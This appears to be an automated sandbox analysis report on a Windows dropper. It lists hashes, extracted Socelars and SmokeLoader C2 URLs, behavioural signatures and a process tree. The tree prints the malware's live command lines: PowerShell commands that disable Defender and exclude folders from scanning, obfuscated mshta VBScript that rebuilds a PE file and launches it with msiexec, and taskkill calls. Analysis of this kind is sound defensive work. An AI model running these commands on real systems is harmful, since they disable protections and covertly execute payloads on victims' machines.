Analysis
  max time kernel: 11s
  max time network: 152s
  platform: windows7_x64
  resource: win7-en-20211208
  submitted: 26/12/2021, 18:41
  Static task: static1
  Behavioral task: behavioral1
  Sample: 2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe
  Resource: win7-en-20211208
General
  Target: 2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe
  Size: 4.4MB
  MD5: 244f3fcae34a514dd3e78f3d4d72f92a
  SHA1: 5ac41859cefd7ad0536b36c7e82f33e702514fe2
  SHA256: 2992c4b00c678a438b0b935e09e0fd341a44c46fe0dd2f18621570f55133e4df
  SHA512: 245ab74d77796452086c2874af05c7c1d51e7c552c47a655388575cb4add160b743082c4db84f35f2755b2caa78b9b4af2577f1785a4919308fefea20acdc53f
Malware Config
  Extracted: socelars
    http://www.iyiqian.com/
    http://www.hbgents.top/
    http://www.rsnzhy.com/
    http://www.efxety.top/
  Extracted: smokeloader
    2020
    http://directorycart.com/upload/
    http://tierzahnarzt.at/upload/
    http://streetofcards.com/upload/
    http://ycdfzd.com/upload/
    http://successcoachceo.com/upload/
    http://uhvu.cn/upload/
    http://japanarticle.com/upload/
Signatures

Process spawned unexpected child process (1 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
  description  pid  pid_target  Process  procid_target
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  2692  2452  rundll32.exe  69

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload (2 IoCs)
  resource  yara_rule
  behavioral1/files/0x0006000000013929-149.dat  family_socelars
  behavioral1/files/0x0006000000013929-185.dat  family_socelars
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
  resource  yara_rule
  behavioral1/files/0x00060000000132fe-69.dat  aspack_v212_v242
  behavioral1/files/0x00060000000132cc-71.dat  aspack_v212_v242
  behavioral1/files/0x00060000000132cc-72.dat  aspack_v212_v242
  behavioral1/files/0x00060000000132fe-70.dat  aspack_v212_v242
  behavioral1/files/0x0006000000013306-75.dat  aspack_v212_v242
  behavioral1/files/0x0006000000013306-76.dat  aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE (15 IoCs)
  pid   Process
  324   setup_installer.exe
  1484  setup_install.exe
  1140  Sun07689b7dd63a1a2e.exe
  828   Sun07426f49ca3.exe
  920   Sun0792bfe25c4e6f.exe
  1892  Sun07853f394a6f2.exe
  1224  Sun07fbac34efb13666.exe
  1256  Sun0705fdd6f3fa.exe
  1504  Sun074dcdeb3534e450.exe
  1792  Sun079abff5ef.exe
  2004  Sun074812abe11c68090.exe
  776   Sun07b9107c074617.exe
  1996  Sun076d6b9f10493573.exe
  1708  Sun074812abe11c68090.tmp
  440   Sun074812abe11c68090.exe

Loads dropped DLL (49 IoCs)
  pid   Process
  1656  2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe
  324   setup_installer.exe
  324   setup_installer.exe
  324   setup_installer.exe
  324   setup_installer.exe
  324   setup_installer.exe
  324   setup_installer.exe
  1484  setup_install.exe
  1484  setup_install.exe
  1484  setup_install.exe
  1484  setup_install.exe
  1484  setup_install.exe
  1484  setup_install.exe
  1484  setup_install.exe
  1484  setup_install.exe
  1012  cmd.exe
  1700  cmd.exe
  1952  cmd.exe
  1488  cmd.exe
  920   Sun0792bfe25c4e6f.exe
  920   Sun0792bfe25c4e6f.exe
  1892  Sun07853f394a6f2.exe
  1892  Sun07853f394a6f2.exe
  1508  cmd.exe
  1508  cmd.exe
  1224  Sun07fbac34efb13666.exe
  1224  Sun07fbac34efb13666.exe
  1728  cmd.exe
  1728  cmd.exe
  2000  cmd.exe
  1256  Sun0705fdd6f3fa.exe
  1256  Sun0705fdd6f3fa.exe
  1744  cmd.exe
  576   cmd.exe
  1504  Sun074dcdeb3534e450.exe
  1504  Sun074dcdeb3534e450.exe
  1616  cmd.exe
  2004  Sun074812abe11c68090.exe
  2004  Sun074812abe11c68090.exe
  1056  cmd.exe
  776   Sun07b9107c074617.exe
  776   Sun07b9107c074617.exe
  1792  Sun079abff5ef.exe
  1792  Sun079abff5ef.exe
  2004  Sun074812abe11c68090.exe
  1708  Sun074812abe11c68090.tmp
  1708  Sun074812abe11c68090.tmp
  1708  Sun074812abe11c68090.tmp
  1708  Sun074812abe11c68090.tmp

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
Looks up external IP address via web service (4 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  12    ip-api.com
  73    ipinfo.io
  74    ipinfo.io
  75    ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (4 IoCs)
  pid   pid_target  Process       procid_target
  1252  1484        WerFault.exe  28
  2936  1792        WerFault.exe  53
  800   1892        WerFault.exe  43
  2864  920         WerFault.exe  46

Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
  description     ioc                                              Process
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  Sun07fbac34efb13666.exe
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  Sun07fbac34efb13666.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  Sun07fbac34efb13666.exe

Kills process with taskkill (2 IoCs)
  pid   Process
  2564  taskkill.exe
  2296  taskkill.exe

Script User-Agent (1 IoCs)
Uses user-agent string associated with script host/environment.
  description             flow  ioc
  HTTP User-Agent header  9     Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  1224  Sun07fbac34efb13666.exe
  1224  Sun07fbac34efb13666.exe
Suspicious use of AdjustPrivilegeToken (34 IoCs)
  description                          pid   Process
  Token: SeCreateTokenPrivilege        1792  Sun079abff5ef.exe
  Token: SeAssignPrimaryTokenPrivilege 1792  Sun079abff5ef.exe
  Token: SeLockMemoryPrivilege         1792  Sun079abff5ef.exe
  Token: SeIncreaseQuotaPrivilege      1792  Sun079abff5ef.exe
  Token: SeMachineAccountPrivilege     1792  Sun079abff5ef.exe
  Token: SeTcbPrivilege                1792  Sun079abff5ef.exe
  Token: SeSecurityPrivilege           1792  Sun079abff5ef.exe
  Token: SeTakeOwnershipPrivilege      1792  Sun079abff5ef.exe
  Token: SeLoadDriverPrivilege         1792  Sun079abff5ef.exe
  Token: SeSystemProfilePrivilege      1792  Sun079abff5ef.exe
  Token: SeSystemtimePrivilege         1792  Sun079abff5ef.exe
  Token: SeProfSingleProcessPrivilege  1792  Sun079abff5ef.exe
  Token: SeIncBasePriorityPrivilege    1792  Sun079abff5ef.exe
  Token: SeCreatePagefilePrivilege     1792  Sun079abff5ef.exe
  Token: SeCreatePermanentPrivilege    1792  Sun079abff5ef.exe
  Token: SeBackupPrivilege             1792  Sun079abff5ef.exe
  Token: SeRestorePrivilege            1792  Sun079abff5ef.exe
  Token: SeShutdownPrivilege           1792  Sun079abff5ef.exe
  Token: SeDebugPrivilege              1792  Sun079abff5ef.exe
  Token: SeAuditPrivilege              1792  Sun079abff5ef.exe
  Token: SeSystemEnvironmentPrivilege  1792  Sun079abff5ef.exe
  Token: SeChangeNotifyPrivilege       1792  Sun079abff5ef.exe
  Token: SeRemoteShutdownPrivilege     1792  Sun079abff5ef.exe
  Token: SeUndockPrivilege             1792  Sun079abff5ef.exe
  Token: SeSyncAgentPrivilege          1792  Sun079abff5ef.exe
  Token: SeEnableDelegationPrivilege   1792  Sun079abff5ef.exe
  Token: SeManageVolumePrivilege       1792  Sun079abff5ef.exe
  Token: SeImpersonatePrivilege        1792  Sun079abff5ef.exe
  Token: SeCreateGlobalPrivilege       1792  Sun079abff5ef.exe
  Token: 31                            1792  Sun079abff5ef.exe
  Token: 32                            1792  Sun079abff5ef.exe
  Token: 33                            1792  Sun079abff5ef.exe
  Token: 34                            1792  Sun079abff5ef.exe
  Token: 35                            1792  Sun079abff5ef.exe
Suspicious use of WriteProcessMemory (64 IoCs)
  description                        pid   Process                                              procid_target
  PID 1656 wrote to memory of 324    1656  2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe  27
  PID 1656 wrote to memory of 324    1656  2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe  27
  PID 1656 wrote to memory of 324    1656  2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe  27
  PID 1656 wrote to memory of 324    1656  2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe  27
  PID 1656 wrote to memory of 324    1656  2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe  27
  PID 1656 wrote to memory of 324    1656  2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe  27
  PID 1656 wrote to memory of 324    1656  2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe  27
  PID 324 wrote to memory of 1484    324   setup_installer.exe  28
  PID 324 wrote to memory of 1484    324   setup_installer.exe  28
  PID 324 wrote to memory of 1484    324   setup_installer.exe  28
  PID 324 wrote to memory of 1484    324   setup_installer.exe  28
  PID 324 wrote to memory of 1484    324   setup_installer.exe  28
  PID 324 wrote to memory of 1484    324   setup_installer.exe  28
  PID 324 wrote to memory of 1484    324   setup_installer.exe  28
  PID 1484 wrote to memory of 1432   1484  setup_install.exe  30
  PID 1484 wrote to memory of 1432   1484  setup_install.exe  30
  PID 1484 wrote to memory of 1432   1484  setup_install.exe  30
  PID 1484 wrote to memory of 1432   1484  setup_install.exe  30
  PID 1484 wrote to memory of 1432   1484  setup_install.exe  30
  PID 1484 wrote to memory of 1432   1484  setup_install.exe  30
  PID 1484 wrote to memory of 1432   1484  setup_install.exe  30
  PID 1484 wrote to memory of 1536   1484  setup_install.exe  31
  PID 1484 wrote to memory of 1536   1484  setup_install.exe  31
  PID 1484 wrote to memory of 1536   1484  setup_install.exe  31
  PID 1484 wrote to memory of 1536   1484  setup_install.exe  31
  PID 1484 wrote to memory of 1536   1484  setup_install.exe  31
  PID 1484 wrote to memory of 1536   1484  setup_install.exe  31
  PID 1484 wrote to memory of 1536   1484  setup_install.exe  31
  PID 1484 wrote to memory of 1952   1484  setup_install.exe  32
  PID 1484 wrote to memory of 1952   1484  setup_install.exe  32
  PID 1484 wrote to memory of 1952   1484  setup_install.exe  32
  PID 1484 wrote to memory of 1952   1484  setup_install.exe  32
  PID 1484 wrote to memory of 1952   1484  setup_install.exe  32
  PID 1484 wrote to memory of 1952   1484  setup_install.exe  32
  PID 1484 wrote to memory of 1952   1484  setup_install.exe  32
  PID 1536 wrote to memory of 1768   1536  cmd.exe  33
  PID 1536 wrote to memory of 1768   1536  cmd.exe  33
  PID 1536 wrote to memory of 1768   1536  cmd.exe  33
  PID 1536 wrote to memory of 1768   1536  cmd.exe  33
  PID 1536 wrote to memory of 1768   1536  cmd.exe  33
  PID 1536 wrote to memory of 1768   1536  cmd.exe  33
  PID 1536 wrote to memory of 1768   1536  cmd.exe  33
  PID 1432 wrote to memory of 1500   1432  cmd.exe  34
  PID 1432 wrote to memory of 1500   1432  cmd.exe  34
  PID 1432 wrote to memory of 1500   1432  cmd.exe  34
  PID 1432 wrote to memory of 1500   1432  cmd.exe  34
  PID 1432 wrote to memory of 1500   1432  cmd.exe  34
  PID 1432 wrote to memory of 1500   1432  cmd.exe  34
  PID 1432 wrote to memory of 1500   1432  cmd.exe  34
  PID 1484 wrote to memory of 1012   1484  setup_install.exe  36
  PID 1484 wrote to memory of 1012   1484  setup_install.exe  36
  PID 1484 wrote to memory of 1012   1484  setup_install.exe  36
  PID 1484 wrote to memory of 1012   1484  setup_install.exe  36
  PID 1484 wrote to memory of 1012   1484  setup_install.exe  36
  PID 1484 wrote to memory of 1012   1484  setup_install.exe  36
  PID 1484 wrote to memory of 1012   1484  setup_install.exe  36
  PID 1484 wrote to memory of 1488   1484  setup_install.exe  35
  PID 1484 wrote to memory of 1488   1484  setup_install.exe  35
  PID 1484 wrote to memory of 1488   1484  setup_install.exe  35
  PID 1484 wrote to memory of 1488   1484  setup_install.exe  35
  PID 1484 wrote to memory of 1488   1484  setup_install.exe  35
  PID 1484 wrote to memory of 1488   1484  setup_install.exe  35
  PID 1484 wrote to memory of 1488   1484  setup_install.exe  35
  PID 1484 wrote to memory of 1700   1484  setup_install.exe  37
Processes
(process tree; [N] is the depth shown in the report, children are indented under their parent)

[1] C:\Users\Admin\AppData\Local\Temp\2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe"
  PID: 1656
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
    PID: 324
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\setup_install.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\setup_install.exe"
      PID: 1484
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        PID: 1432
        - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          PID: 1500
      [4] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        PID: 1536
        - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          PID: 1768
      [4] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun0792bfe25c4e6f.exe
        PID: 1952
        - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun0792bfe25c4e6f.exe
          Command line: Sun0792bfe25c4e6f.exe
          PID: 920
          - Executes dropped EXE
          - Loads dropped DLL
          [6] C:\Users\Admin\Pictures\Adobe Films\KXxSNol25lS1UKrNoIN4b4a_.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\KXxSNol25lS1UKrNoIN4b4a_.exe"
            PID: 2648
          [6] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 920 -s 1536
            PID: 2864
            - Program crash
      [4] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun07853f394a6f2.exe
        PID: 1488
        - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun07853f394a6f2.exe
          Command line: Sun07853f394a6f2.exe
          PID: 1892
          - Executes dropped EXE
          - Loads dropped DLL
          [6] C:\Users\Admin\Pictures\Adobe Films\KXxSNol25lS1UKrNoIN4b4a_.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\KXxSNol25lS1UKrNoIN4b4a_.exe"
            PID: 1736
          [6] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1892 -s 1508
            PID: 800
            - Program crash
      [4] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun07426f49ca3.exe
        PID: 1012
        - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun07426f49ca3.exe
          Command line: Sun07426f49ca3.exe
          PID: 828
          - Executes dropped EXE
      [4] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun07689b7dd63a1a2e.exe
        PID: 1700
        - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun07689b7dd63a1a2e.exe
          Command line: Sun07689b7dd63a1a2e.exe
          PID: 1140
          - Executes dropped EXE
      [4] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun07aef696b81cc09ee.exe
        PID: 588
      [4] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun07fbac34efb13666.exe
        PID: 1508
        - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun07fbac34efb13666.exe
          Command line: Sun07fbac34efb13666.exe
          PID: 1224
          - Executes dropped EXE
          - Loads dropped DLL
          - Checks SCSI registry key(s)
          - Suspicious behavior: EnumeratesProcesses
      [4] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun074812abe11c68090.exe
        PID: 1744
        - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun074812abe11c68090.exe
          Command line: Sun074812abe11c68090.exe
          PID: 2004
          - Executes dropped EXE
          - Loads dropped DLL
          [6] C:\Users\Admin\AppData\Local\Temp\is-4KD7A.tmp\Sun074812abe11c68090.tmp
            Command line: "C:\Users\Admin\AppData\Local\Temp\is-4KD7A.tmp\Sun074812abe11c68090.tmp" /SL5="$1016E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun074812abe11c68090.exe"
            PID: 1708
            - Executes dropped EXE
            - Loads dropped DLL
            [7] C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun074812abe11c68090.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun074812abe11c68090.exe" /SILENT
              PID: 440
              - Executes dropped EXE
              [8] C:\Users\Admin\AppData\Local\Temp\is-U0VM0.tmp\Sun074812abe11c68090.tmp
                Command line: "C:\Users\Admin\AppData\Local\Temp\is-U0VM0.tmp\Sun074812abe11c68090.tmp" /SL5="$2016E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun074812abe11c68090.exe" /SILENT
                PID: 1920
      [4] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun0705fdd6f3fa.exe /mixone
        PID: 1728
        - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun0705fdd6f3fa.exe
          Command line: Sun0705fdd6f3fa.exe /mixone
          PID: 1256
          - Executes dropped EXE
          - Loads dropped DLL
      [4] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun07b9107c074617.exe
        PID: 1616
        - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun07b9107c074617.exe
          Command line: Sun07b9107c074617.exe
          PID: 776
          - Executes dropped EXE
          - Loads dropped DLL
          [6] C:\Windows\SysWOW64\mshta.exe
            Command line: "C:\Windows\System32\mshta.exe" VBSCRIpt: CloSE ( cREatEobJECt( "wsCRIpT.shElL" ). run( "CMd.exE /q /C CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun07b9107c074617.exe"" ..\nU82.eXE && staRT ..\NU82.ExE -pfpj1T6lr~GKuX &IF """" =="""" for %e iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun07b9107c074617.exe"" ) do taskkill /f -im ""%~nxe"" ", 0 ,tRUE ) )
            PID: 1352
            [7] C:\Windows\SysWOW64\cmd.exe
              Command line: "C:\Windows\System32\cmd.exe" /q /C CoPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun07b9107c074617.exe" ..\nU82.eXE &&staRT ..\NU82.ExE -pfpj1T6lr~GKuX &IF "" =="" for %e iN ("C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun07b9107c074617.exe" ) do taskkill /f -im "%~nxe"
              PID: 2220
              [8] C:\Windows\SysWOW64\taskkill.exe
                Command line: taskkill /f -im "Sun07b9107c074617.exe"
                PID: 2296
                - Kills process with taskkill
              [8] C:\Users\Admin\AppData\Local\Temp\nU82.eXE
                Command line: ..\NU82.ExE -pfpj1T6lr~GKuX
                PID: 2284
                [9] C:\Windows\SysWOW64\mshta.exe
                  Command line: "C:\Windows\System32\mshta.exe" VBSCRIpt: CloSE ( cREatEobJECt( "wsCRIpT.shElL" ). run( "CMd.exE /q /C CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\nU82.eXE"" ..\nU82.eXE && staRT ..\NU82.ExE -pfpj1T6lr~GKuX &IF ""-pfpj1T6lr~GKuX "" =="""" for %e iN ( ""C:\Users\Admin\AppData\Local\Temp\nU82.eXE"" ) do taskkill /f -im ""%~nxe"" ", 0 ,tRUE ) )
                  PID: 2324
                  [10] C:\Windows\SysWOW64\cmd.exe
                    Command line: "C:\Windows\System32\cmd.exe" /q /C CoPY /Y "C:\Users\Admin\AppData\Local\Temp\nU82.eXE" ..\nU82.eXE &&staRT ..\NU82.ExE -pfpj1T6lr~GKuX &IF "-pfpj1T6lr~GKuX " =="" for %e iN ("C:\Users\Admin\AppData\Local\Temp\nU82.eXE" ) do taskkill /f -im "%~nxe"
                    PID: 2508
                [9] C:\Windows\SysWOW64\mshta.exe
                  Command line: "C:\Windows\System32\mshta.exe" vbscrIPT: CLOSE(cREATeOBJecT ( "wSCRIpT.ShELl" ). run ("cmd /q /R echo FZm4VC:\Users\Admin\AppData\Local\Tempg5i> UX2~UVnN.VM2 & eChO | sET /p = ""MZ"" > 4LNjycCw.Z2 & coPy /Y /b 4lNjyCCw.Z2 +I8PJbEWl.S +2PhmN.E8 + 5Fn2PWY8.H + F3QYhGW.Jz + NXKZ.hO + UX2~UVNN.vM2 ..\vFeGMw.qLW & DEL /Q *& STArt msiexec.exe -y ..\vFEGMW.QlW " , 0 ,trUE) )
                  PID: 2720
                  [10] C:\Windows\SysWOW64\cmd.exe
                    Command line: "C:\Windows\System32\cmd.exe" /q /R echo FZm4VC:\Users\Admin\AppData\Local\Tempg5i> UX2~UVnN.VM2 &eChO | sET /p = "MZ" > 4LNjycCw.Z2 & coPy /Y /b 4lNjyCCw.Z2 +I8PJbEWl.S+2PhmN.E8 + 5Fn2PWY8.H + F3QYhGW.Jz +NXKZ.hO +UX2~UVNN.vM2 ..\vFeGMw.qLW &DEL /Q *& STArt msiexec.exe -y ..\vFEGMW.QlW
                    PID: 2952
                    [11] C:\Windows\SysWOW64\cmd.exe
                      Command line: C:\Windows\system32\cmd.exe /S /D /c" eChO "
                      PID: 3012
                    [11] C:\Windows\SysWOW64\cmd.exe
                      Command line: C:\Windows\system32\cmd.exe /S /D /c" sET /p = "MZ" 1>4LNjycCw.Z2"
                      PID: 3024
                    [11] C:\Windows\SysWOW64\msiexec.exe
                      Command line: msiexec.exe -y ..\vFEGMW.QlW
                      PID: 3060
      [4] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun079abff5ef.exe
        PID: 576
        - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun079abff5ef.exe
          Command line: Sun079abff5ef.exe
          PID: 1792
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\SysWOW64\cmd.exe
            Command line: cmd.exe /c taskkill /f /im chrome.exe
            PID: 2480
            [7] C:\Windows\SysWOW64\taskkill.exe
              Command line: taskkill /f /im chrome.exe
              PID: 2564
              - Kills process with taskkill
          [6] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 1440
            PID: 2936
            - Program crash
      [4] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun076d6b9f10493573.exe
        PID: 1056
        - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun076d6b9f10493573.exe
          Command line: Sun076d6b9f10493573.exe
          PID: 1996
          - Executes dropped EXE
      [4] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun074dcdeb3534e450.exe
        PID: 2000
        - Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zS44183DD5\Sun074dcdeb3534e450.exe
          Command line: Sun074dcdeb3534e450.exe
          PID: 1504
          - Executes dropped EXE
          - Loads dropped DLL
      [4] C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1484 -s 468
        PID: 1252
        - Program crash

[1] C:\Windows\system32\rundll32.exe
  Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  PID: 2692
  - Process spawned unexpected child process
  [2] C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    PID: 2700

[1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k SystemNetworkService
  PID: 2852